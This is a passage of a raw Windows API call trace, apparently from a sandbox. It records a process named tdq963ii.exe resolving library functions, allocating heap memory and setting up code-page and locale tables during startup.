(hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0233.068] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0233.069] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0233.069] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0233.069] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0233.069] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0233.069] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0233.070] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0233.070] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0233.070] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0233.070] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0233.070] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0233.071] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0233.071] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0233.071] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0233.071] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0233.071] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0233.071] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0233.071] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0233.072] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0233.072] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0233.072] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0233.072] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0233.072] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0233.072] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0233.072] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0233.073] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0233.073] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x41cf8820, dwHighDateTime=0x1d68287)) [0233.073] GetCurrentThreadId () returned 0x6a0 [0233.073] GetCurrentProcessId () returned 0xb54 [0233.073] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35341199612) returned 1 [0233.073] GetProcessHeap () returned 0x580000 [0233.073] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0233.073] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0233.073] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0233.074] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0233.075] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0233.076] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0233.077] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3bc) returned 0x5960d0 [0233.077] GetCurrentThreadId () returned 0x6a0 [0233.077] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x18) returned 0x596498 [0233.077] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x800) returned 0x5964b8 [0233.077] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x7a66ef1b, hStdError=0x0)) [0233.077] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0233.077] GetFileType (hFile=0x3) returned 0x2 [0233.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0233.079] GetFileType (hFile=0x80) returned 0x3 [0233.079] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0233.079] GetFileType (hFile=0xb) returned 0x2 [0233.274] GetCommandLineW () returned="tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner" [0233.275] GetEnvironmentStringsW () returned 0x596cc0* [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xb88) returned 0x597850 [0233.275] FreeEnvironmentStringsW (penv=0x596cc0) returned 1 [0233.275] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x7c) returned 0x596cc0 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xa0) returned 0x596d48 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3e) returned 0x5983f8 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x6c) returned 0x596df0 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x6e) returned 0x596e68 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x78) returned 0x58f8f0 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x62) returned 0x596ee0 [0233.275] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x596f50 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x596f88 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2c) returned 0x596fd8 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x28) returned 0x597010 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1a) returned 0x595aa0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x4a) returned 0x597040 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x72) returned 0x58f970 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x597098 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x5970d0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1c) returned 0x595ac8 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0xd2) returned 0x597108 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x7c) returned 0x5971e8 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x36) returned 0x597270 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3a) returned 0x598440 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x90) returned 0x5972b0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x597348 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x597378 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x36) returned 0x5973b0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x48) returned 0x5973f0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x52) returned 0x597440 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x598488 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x18) returned 0x5974a0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x82) returned 0x5974c0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2e) returned 0x597550 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x1e) returned 0x595af0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2c) returned 0x597588 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x54) returned 0x5975c0 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x52) returned 0x597620 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x2a) returned 0x597680 [0233.276] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x3c) returned 0x5984d0 [0233.277] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x54) returned 0x5976b8 [0233.277] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x24) returned 0x597718 [0233.277] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x30) returned 0x597748 [0233.277] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x8c) returned 0x597780 [0233.277] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x597850 | out: hHeap=0x580000) returned 1 [0233.277] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x8, Size=0x800) returned 0x597818 [0233.277] GetLastError () returned 0x0 [0233.277] SetLastError (dwErrCode=0x0) [0233.277] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] GetACP () returned 0x4e4 [0233.278] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x220) returned 0x598020 [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] IsValidCodePage (CodePage=0x4e4) returned 1 [0233.278] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0233.278] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0233.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0233.278] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0233.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0233.278] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0233.278] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0233.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x8bîfzäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0233.278] GetLastError () returned 0x0 [0233.278] SetLastError (dwErrCode=0x0) [0233.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0233.279] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0233.279] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0233.279] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" 